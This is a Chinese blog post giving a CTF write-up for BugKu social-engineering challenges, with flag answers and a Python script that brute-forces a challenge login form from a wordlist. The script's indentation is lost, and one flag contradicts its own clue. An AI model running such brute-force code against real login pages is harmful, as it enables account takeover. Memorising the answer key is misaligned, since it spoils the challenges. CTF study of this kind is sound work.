带你上分,顺便拿下CTF|BugKu 社会工程学

BugKu社会工程学题型


1、密码

题干: 姓名:张三 生日;19970315 KEY格式KEY{xxxxxxxxxx}

解析: 直接首字母zs,生日,就行

答案: flag{zs199970315}

2、信息查找

题干: 信息查找 听说bugku.cn 在今日头条上能找到?? 提示:flag为群号码 格式KEY{xxxxxxxxxxx}

解析: 直接百度搜索

3、简单个人信息收集

参考链接题干:1.zip

解析:首先尝试爆破,而后考虑ZIP伪加密,伪加密破解工具:

答案: flag{15206164164}

4、社工进阶

题干:解析:百度贴吧搜索 孤长离

答案: KEY{sg1H78Si9C0s99Q}

5、王小明的日记

参考链接

解析:注意题干提示的信息:bugku在线工具使用的工具为:在线密码攻击使用在线密码攻击,生成字典:

import requests,re
 
def req(pwd):
url='http://120.24.86.145:8002/xiaoming/?yes'
s = requests.session()
r = s.get(url)
r.encoding = 'utf-8'
# print(r.text)
response = s.post(url,data={'pwd':pwd})
response.encoding = 'utf-8'
# print(response.text)
b = re.findall(r'密码不正确,请重新输入', response.text)
# print(b)
return b
 
def zidian():
f = open('mima.txt','r',encoding='UTF-8')
a = f.read()
a = a.splitlines()
return a
 
 
a = zidian()
for pwd in a:
b = req(pwd)
try:
if b[0] == '密码不正确,请重新输入':
# print(b[0])
pass
except:
print(pwd)
break 

参考链接

python3.5 crack.py

wxm 

密码wxm

答案:flag{bugku-shegong_xmq}参考链接1

6、简单的社工尝试

解析:findneo.github.io/180406Bugku…参考链接:参考链接1参考链接2参考链接3github.com/bugkuweibo.com/bugkuc.bugku.com/13211.txt

网络安全工程师(白帽子)企业级学习路线

第一阶段:安全基础(入门)

img

第二阶段:Web渗透(初级网安工程师)

img

第三阶段:进阶部分(中级网络安全工程师)

img

学习资源分享

学习资源分享

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值